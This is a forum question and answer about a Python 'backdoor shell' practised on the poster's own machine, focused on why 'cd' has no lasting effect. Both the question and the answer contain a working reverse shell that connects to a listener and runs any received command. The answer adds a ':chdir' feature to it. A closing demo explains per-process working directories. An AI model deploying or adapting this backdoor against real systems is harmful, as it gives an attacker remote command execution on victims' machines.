Backdoor Shell doesn't allow me to change Directory


Question

Below you can see a Python script which establishes a connection to my machine on port 1234. Using Netcat I can listen on that port and then perform actions on my machine using the terminal (I know that this is trivial, but it's just for practicing).

Now the problem is that commands like "ls", "mkdir", "pwd", "rm" or even "ls /root/Desktop/" are working, however "cd /root/Desktop" or "cd .." are not working, which is actually really bad. Typing in "cd .." is not returning any error message, but it's also not changing the directory. I cannot leave my python directory.

The script is as follows:

#! /usr/bin/python
import socket
import subprocess

host = "localhost"
port = 1234
passwd = "hacking"


def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)

    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()

def shell():
    while True:
        data = s.recv(1024)

        if data.strip() == ":kill":
              break

        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()

I got it from here.

Can anyone help me out? Any idea why I cannot leave the directory? Thanks in advance!

Recommended answer

It actually works fine. What if you tried this in a single command: cd /other/directory; ls. You'll see that the directory did in fact "change" for the duration of that command. Every new command gets a fresh environment (so back to the same original directory). If you really want to change the "server context" in between commands, then you need to do that in Python. Below is a dirty example added onto the code you provided:

#! /usr/bin/python
import socket
import subprocess
import os

host = "localhost"
port = 12345
passwd = "hacking"


def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)

    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()

def shell():
    while True:
        data = s.recv(1024).strip()

        if data == ":kill":
              break

        try:
            cmd, params = data.split(" ", 1)
            if cmd == ":chdir":
                os.chdir(params)
                print "chdir to %s" % (params)
                s.send("#> ")
                continue
        except:
            pass

        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()

Same idea as your ":kill" command: if the script sees a ":chdir /new/directory", then Python executes the chdir function; otherwise pass it on to Popen.
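
The per-process working directory behaviour described in the answer, as an added local demonstration that is not part of the original question or answer: every `shell=True` call starts a new child shell, so a `cd` made there never reaches the parent process. It is written for Python 3 and uses no sockets; `run` and `demo` are hypothetical helper names and the temporary directory is constructed sample input.

```python
import os
import shlex
import subprocess
import tempfile


def run(command, cwd=None):
    """Run one command line in its own child shell and return its stdout."""
    proc = subprocess.run(command, shell=True, cwd=cwd,
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    return proc.stdout.decode().strip()


def demo():
    """Return the directory observed in each case, keyed by case name."""
    start = os.path.realpath(os.getcwd())
    target = os.path.realpath(tempfile.mkdtemp())  # constructed sample directory
    quoted = shlex.quote(target)
    seen = {"start": start, "target": target}
    try:
        # 1. `cd` runs in a child shell; when that shell exits, its cwd is gone.
        run("cd %s" % quoted)
        seen["after_cd_in_child"] = os.path.realpath(run("pwd"))
        # 2. Same shell, same command line: `pwd` sees the change.
        seen["cd_and_pwd_together"] = os.path.realpath(run("cd %s; pwd" % quoted))
        # 3. cwd= starts one child in target and leaves the parent untouched.
        seen["cwd_argument"] = os.path.realpath(run("pwd", cwd=target))
        seen["parent_after_cwd_argument"] = os.path.realpath(os.getcwd())
        # 4. os.chdir changes the parent, so every later child inherits it.
        os.chdir(target)
        seen["after_os_chdir"] = os.path.realpath(run("pwd"))
    finally:
        os.chdir(start)   # restore the parent's directory
        os.rmdir(target)  # remove the constructed directory
    return seen


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-28s %s" % (name, value))
```

Case 1 is the behaviour the question reports, case 2 is the single-command check the answer suggests, and case 4 is what the answer's `os.chdir` call does.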
